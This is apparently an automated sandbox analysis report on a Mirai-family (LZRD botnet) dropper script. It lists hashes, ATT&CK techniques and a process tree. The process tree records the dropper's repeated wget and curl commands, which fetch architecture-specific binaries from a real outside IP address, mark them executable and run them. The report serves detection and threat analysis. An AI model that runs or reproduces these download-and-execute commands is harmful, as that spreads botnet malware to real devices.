Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
-
submitted
21-01-2025 21:07
General
-
Target
ohshit.sh
-
Size
3KB
-
MD5
d91a756fa0b51d26ca560e689c65f02a
-
SHA1
dca13e8c0ff369c8850b09e06eb9aecde38da7ad
-
SHA256
4f1c0d593b90f06aadb41e43d72dabe8a57d52df99bdfbf67db6e2e3aecdfdcf
-
SHA512
5386d2bb591a257c64e71563c16435bf9f606d813031417233700d22e0b31bad1f33f73ae7ef581033c3c1633ca9b897d162a64019fc415ba6d9505a7b7f8533
Score
10/10
Malware Config
Extracted
Family
mirai
Botnet
LZRD
Extracted
Family
mirai
Botnet
LZRD
Extracted
Family
mirai
Botnet
LZRD
Signatures
-
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 15 IoCs
-
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 4 IoCs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks CPU configuration 1 TTPs 15 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x862⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat uqwodquojqoqdo.x862⤵
-
-
/bin/chmodchmod +x ohshit.sh oqweoqeqq systemd-private-3b25413c2170426497b63d871f25f6b2-systemd-timedated.service-GkC3BT uqwodquojqoqdo.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/oqweoqeqq./oqweoqeqq2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/catcat uqwodquojqoqdo.mips2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod +x ohshit.sh oqweoqeqq systemd-private-3b25413c2170426497b63d871f25f6b2-systemd-timedated.service-GkC3BT uqwodquojqoqdo.mips uqwodquojqoqdo.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/oqweoqeqq./oqweoqeqq2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat uqwodquojqoqdo.arc2⤵
-
-
/bin/chmodchmod +x ohshit.sh oqweoqeqq systemd-private-3b25413c2170426497b63d871f25f6b2-systemd-timedated.service-GkC3BT uqwodquojqoqdo.arc uqwodquojqoqdo.mips uqwodquojqoqdo.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/oqweoqeqq./oqweoqeqq2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i4682⤵
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i4682⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat uqwodquojqoqdo.i4682⤵
-
-
/bin/chmodchmod +x ohshit.sh oqweoqeqq systemd-private-3b25413c2170426497b63d871f25f6b2-systemd-timedated.service-GkC3BT uqwodquojqoqdo.arc uqwodquojqoqdo.i468 uqwodquojqoqdo.mips uqwodquojqoqdo.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/oqweoqeqq./oqweoqeqq2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i6862⤵
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat uqwodquojqoqdo.i6862⤵
-
-
/bin/chmodchmod +x ohshit.sh oqweoqeqq systemd-private-3b25413c2170426497b63d871f25f6b2-systemd-timedated.service-GkC3BT uqwodquojqoqdo.arc uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/oqweoqeqq./oqweoqeqq2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86_642⤵
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat uqwodquojqoqdo.x86_642⤵
-
-
/bin/chmodchmod +x ohshit.sh oqweoqeqq systemd-private-3b25413c2170426497b63d871f25f6b2-systemd-timedated.service-GkC3BT uqwodquojqoqdo.arc uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/oqweoqeqq./oqweoqeqq2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mpsl2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.mpsl2⤵
- Checks CPU configuration
- Writes file to tmp directory
-
-
/bin/catcat uqwodquojqoqdo.mpsl2⤵
-
-
/bin/chmodchmod +x ohshit.sh oqweoqeqq systemd-private-3b25413c2170426497b63d871f25f6b2-systemd-timedated.service-GkC3BT uqwodquojqoqdo.arc uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/oqweoqeqq./oqweoqeqq2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat uqwodquojqoqdo.arm2⤵
-
-
/bin/chmodchmod +x ohshit.sh oqweoqeqq systemd-private-3b25413c2170426497b63d871f25f6b2-systemd-timedated.service-GkC3BT uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/oqweoqeqq./oqweoqeqq2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm52⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat uqwodquojqoqdo.arm52⤵
-
-
/bin/chmodchmod +x ohshit.sh oqweoqeqq systemd-private-3b25413c2170426497b63d871f25f6b2-systemd-timedated.service-GkC3BT uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/oqweoqeqq./oqweoqeqq2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm62⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm62⤵
- Checks CPU configuration
- Writes file to tmp directory
-
-
/bin/catcat uqwodquojqoqdo.arm62⤵
-
-
/bin/chmodchmod +x ohshit.sh oqweoqeqq systemd-private-3b25413c2170426497b63d871f25f6b2-systemd-timedated.service-GkC3BT uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.arm6 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/oqweoqeqq./oqweoqeqq2⤵
- Executes dropped EXE
- Reads runtime system information
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm72⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat uqwodquojqoqdo.arm72⤵
-
-
/bin/chmodchmod +x ohshit.sh oqweoqeqq uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.arm6 uqwodquojqoqdo.arm7 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/oqweoqeqq./oqweoqeqq2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.ppc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.ppc2⤵
- Checks CPU configuration
- Writes file to tmp directory
-
-
/bin/catcat uqwodquojqoqdo.ppc2⤵
-
-
/bin/chmodchmod +x ohshit.sh oqweoqeqq uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.arm6 uqwodquojqoqdo.arm7 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.ppc uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/oqweoqeqq./oqweoqeqq2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.spc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat uqwodquojqoqdo.spc2⤵
-
-
/bin/chmodchmod +x ohshit.sh oqweoqeqq uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.arm6 uqwodquojqoqdo.arm7 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.ppc uqwodquojqoqdo.spc uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/oqweoqeqq./oqweoqeqq2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.m68k2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat uqwodquojqoqdo.m68k2⤵
-
-
/bin/chmodchmod +x ohshit.sh oqweoqeqq uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.arm6 uqwodquojqoqdo.arm7 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.m68k uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.ppc uqwodquojqoqdo.spc uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/oqweoqeqq./oqweoqeqq2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://107.172.51.228/hiddenbin/uqwodquojqoqdo.sh42⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://107.172.51.228/hiddenbin/uqwodquojqoqdo.sh42⤵
- Checks CPU configuration
- Writes file to tmp directory
-
-
/bin/catcat uqwodquojqoqdo.sh42⤵
-
-
/bin/chmodchmod +x ohshit.sh oqweoqeqq uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.arm6 uqwodquojqoqdo.arm7 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.m68k uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.ppc uqwodquojqoqdo.sh4 uqwodquojqoqdo.spc uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/oqweoqeqq./oqweoqeqq2⤵
- Executes dropped EXE
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD5553fbff4e8c1e5b9468cc5d81f47f451
SHA14c65f38b9adca335e1185d23447bbb3e4b61dbc6
SHA2561ee8b2996d1ceb800d962878c83e6bf8ef67f3ea1bcba0cba0d49b31b3596336
SHA512d3f9c1494e85673583ab60f697395de05e200006f03b1bfacd7ef0e17488d09c81e908266f765bb7c84771cfb39957f66350509c9b566d5ea50130763deadf85
-
Filesize
105KB
MD58a0eb12f131a868513eacb61b4c8fb62
SHA1fbac5d15efd4502f89b515693906d772f5711855
SHA2564f54d6dc5fdca9535fc7ff25709e90936d1fb9ed6d52302bc5aab624ea4a6fed
SHA51204e242e0d2d023f70ec1da3624d01054bbca46476463e4f0bba3ce738449c660edcd0753dc96a887f4e81bd3086b87253e2ecc02644e5afc9646f9da60c25a72
-
Filesize
227B
MD57aec1ea74a5502ca7b6c9047970a4c5c
SHA161c91074e6071c8a3bda8433d412eeead2843d78
SHA2562ec2f59ef2aaaaaa0d7e8241aa00f54ff05f3cbb7a2d3544611e495b7e55c779
SHA5129ce37859d0e886cfe84ca449cbfd7308a68cec348b01f60a15f3fd69ccb38c05857791a0441d3dec06d3db6872d7bbca823b9db93848534bae03be6e8d45b709
-
Filesize
227B
MD5cfa7530bf969f685bd8b26dbf7518d77
SHA1209b6a5988243b82d8fd0c8e6bc4452d0aa6140f
SHA25669e43487c004f9d71ce95fefae25bd50b23c199bfe0d73e04a7b56d2e3327e20
SHA512e92c83dd5112e9d8fa92919aeea85e8c3cc10e64901e207d326f9815fd665ca922494199f4f399b2040b8e62e0e3af00411cc759866735aa255cd04f67d3574c
-
Filesize
57KB
MD5405f165092be3a00be30fc086d128883
SHA195a5dc07ff75bb2a545e0f64a5dba0f571f8336b
SHA256067156679583ce84ad5e7329f087a7b3b27f15d69336135f992d03179c614947
SHA512cf70bc7bd4ab0c7da644ed0742714e7ee292645ade1a090f4f763ff8d10d7cd71fa6b826487b33a906e7ec228876cbed5259aba20a3504adc377e77e705e499f
-
Filesize
20KB
MD5313c4b235e0e62ca38eb04bfa7677e44
SHA1c31d5d0c0fa4bfa4ea2837cede424504c68ccfd3
SHA256dfd6f81327b03f5336895c6bed7bfff178a054eafef5637ccb74e7a0ac4ef4c4
SHA5120bf52b087e48b6daac55f735ae5b5af7626322db3200e72c61755d6b80234c503a02f3e35b340b70d1731fdec2054f530251504dec55497ca5877f9233ff54ad